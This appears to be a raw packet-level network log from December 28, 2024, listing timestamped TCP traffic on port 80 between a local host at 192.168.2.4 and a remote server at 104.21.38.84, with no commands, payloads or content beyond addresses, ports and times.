                                                                        Dec 28, 2024 20:43:15.108741999 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:15.109832048 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:15.110528946 CET4978380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:15.230005026 CET8049781104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:15.230077982 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:15.230103970 CET8049783104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:15.230169058 CET4978380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:15.230312109 CET4978380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:15.350239992 CET8049783104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:15.517442942 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:15.563507080 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:15.579382896 CET4978380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:15.699273109 CET8049783104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:15.699282885 CET8049783104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:15.699345112 CET8049783104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:15.727637053 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:15.729614973 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:15.851028919 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.063652039 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.063836098 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:16.183852911 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.183916092 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.407732964 CET8049783104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.454133987 CET4978380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:16.551489115 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.554124117 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:16.662080050 CET8049783104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.673650026 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.719780922 CET4978380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:16.781774998 CET4978380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:16.783077955 CET4978980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:16.886837006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.890227079 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:16.903307915 CET8049783104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.904107094 CET8049789104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:16.904160976 CET4978380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:16.904191971 CET4978980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:16.904313087 CET4978980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:17.009963036 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.009973049 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.023802996 CET8049789104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.251120090 CET4978980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:17.377129078 CET8049789104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.377263069 CET8049789104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.379911900 CET8049789104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.390621901 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.396971941 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:17.516680956 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.729826927 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.730077982 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:17.849715948 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:17.849828959 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.081552029 CET8049789104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.126044989 CET4978980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:18.263089895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.267832994 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:18.333076000 CET8049789104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.376060009 CET4978980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:18.388022900 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.507533073 CET4978980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:18.508203030 CET4979580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:18.600934982 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.601306915 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:18.627772093 CET8049789104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.627868891 CET8049795104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.627917051 CET4978980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:18.627950907 CET4979580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:18.628122091 CET4979580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:18.721113920 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.721123934 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.747874022 CET8049795104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:18.985600948 CET4979580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:19.097357035 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:19.103744030 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:19.105478048 CET8049795104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:19.105488062 CET8049795104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:19.105530977 CET8049795104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:19.223400116 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:19.436144114 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:19.436388016 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:19.560501099 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:19.560698986 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:19.796606064 CET8049795104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:19.844750881 CET4979580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:20.039907932 CET8049795104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:20.094750881 CET4979580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:20.285274029 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:20.298218012 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:20.418870926 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:20.490068913 CET4979580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:20.492187023 CET4979680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:20.609922886 CET8049795104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:20.609967947 CET4979580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:20.611732006 CET8049796104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:20.611788034 CET4979680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:20.611946106 CET4979680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:20.632345915 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:20.632512093 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:20.731372118 CET8049796104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:20.752011061 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:20.752095938 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:20.969981909 CET4979680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:21.089742899 CET8049796104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:21.089752913 CET8049796104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:21.089778900 CET8049796104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:21.165225029 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:21.167397976 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:21.289213896 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:21.502115011 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:21.502294064 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:21.622273922 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:21.622533083 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:21.789408922 CET8049796104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:21.866017103 CET4979680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:22.031809092 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.032783985 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:22.041160107 CET8049796104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.154758930 CET4979680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:22.155545950 CET4980280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:22.157092094 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.274571896 CET8049796104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.274641037 CET4979680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:22.274981022 CET8049802104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.275048971 CET4980280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:22.275301933 CET4980280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:22.370179892 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.370348930 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:22.394711971 CET8049802104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.489955902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.490004063 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.626125097 CET4980280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:22.789180994 CET8049802104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.789191961 CET8049802104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.789200068 CET8049802104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.894323111 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:22.895291090 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:23.014822006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:23.227587938 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:23.227844000 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:23.347402096 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:23.347536087 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:23.359200001 CET8049802104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:23.500691891 CET4980280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:23.608197927 CET8049802104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:23.704166889 CET4980280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:23.758641005 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:23.759478092 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:23.799776077 CET8049802104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:23.878910065 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:23.907260895 CET4980280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:23.926054955 CET4980280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:23.926801920 CET4980880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:24.051781893 CET8049802104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.051971912 CET4980280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:24.052051067 CET8049808104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.052117109 CET4980880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:24.052297115 CET4980880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:24.091854095 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.092124939 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:24.171868086 CET8049808104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.211704969 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.211930037 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.407542944 CET4980880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:24.527493000 CET8049808104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.527502060 CET8049808104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.527509928 CET8049808104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.616415977 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.617659092 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:24.738135099 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.950383902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:24.950581074 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:25.071404934 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.071542978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.190083027 CET8049808104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.320199966 CET4980880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:25.535326004 CET8049808104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.535661936 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.536493063 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:25.657783031 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.685861111 CET4980880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:25.686803102 CET4981480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:25.806754112 CET8049808104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.806765079 CET8049814104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.806812048 CET4980880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:25.806854010 CET4981480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:25.806969881 CET4981480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:25.870805025 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.870956898 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:25.926419973 CET8049814104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.990586042 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:25.990602970 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:26.157352924 CET4981480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:26.277124882 CET8049814104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:26.277133942 CET8049814104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:26.277143002 CET8049814104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:26.361710072 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:26.501018047 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:26.572096109 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:26.572885036 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:26.692861080 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:26.905605078 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:26.908293009 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:26.938030005 CET8049814104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.028110981 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.028120995 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.094779015 CET4981480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:27.180099964 CET8049814104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.318022013 CET4981480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:27.318790913 CET4981580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:27.391680002 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.393719912 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:27.437923908 CET8049814104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.438213110 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.438286066 CET4981480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:27.438328981 CET4981580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:27.438606977 CET4981580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:27.513187885 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.558363914 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.726210117 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.735799074 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:27.798027992 CET4981580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:27.857110023 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.857142925 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.918052912 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.918085098 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:27.918119907 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:28.738457918 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:28.739203930 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:28.739272118 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:28.739329100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:28.739376068 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:28.765451908 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:28.765513897 CET4981580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:28.860701084 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:28.896902084 CET4981580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:28.898128033 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.094862938 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.219767094 CET4981580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.232881069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.235445976 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.235548973 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.235702991 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.235754013 CET4981580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.235821009 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.235925913 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.235955000 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.339421988 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.356053114 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.407280922 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.422972918 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.424324989 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.594844103 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.597209930 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.598027945 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.715183020 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.715245008 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.715291023 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.717792988 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.930958986 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.932240963 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.052074909 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.052119970 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.366914988 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.422889948 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.459198952 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.460010052 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.579642057 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.617439032 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.719887018 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.754870892 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.755480051 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.792371988 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.792540073 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.878711939 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.878796101 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.878926039 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.878994942 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.879215956 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.913192034 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.913223028 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.000298023 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.235578060 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:31.328547955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.329832077 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:31.355487108 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.355520964 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.355679989 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.449414015 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.662265062 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.662457943 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:31.783035040 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.783098936 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.057957888 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.191565037 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.194210052 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.204457045 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.313186884 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.313714027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.391748905 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.438137054 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.439095974 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.548446894 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.732673883 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.732943058 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.732953072 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.733000040 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.733033895 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.733181000 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.733264923 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.733274937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.797899008 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.853406906 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.874682903 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.874871016 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.077462912 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.079530954 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.080450058 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.199073076 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.199137926 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.199347019 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.199901104 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.412977934 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.413194895 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.533201933 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.533276081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.819001913 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.867135048 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.941068888 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.949125051 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.058556080 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.068772078 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.186651945 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.187393904 CET4983480192.168.2.4104.21.38.84
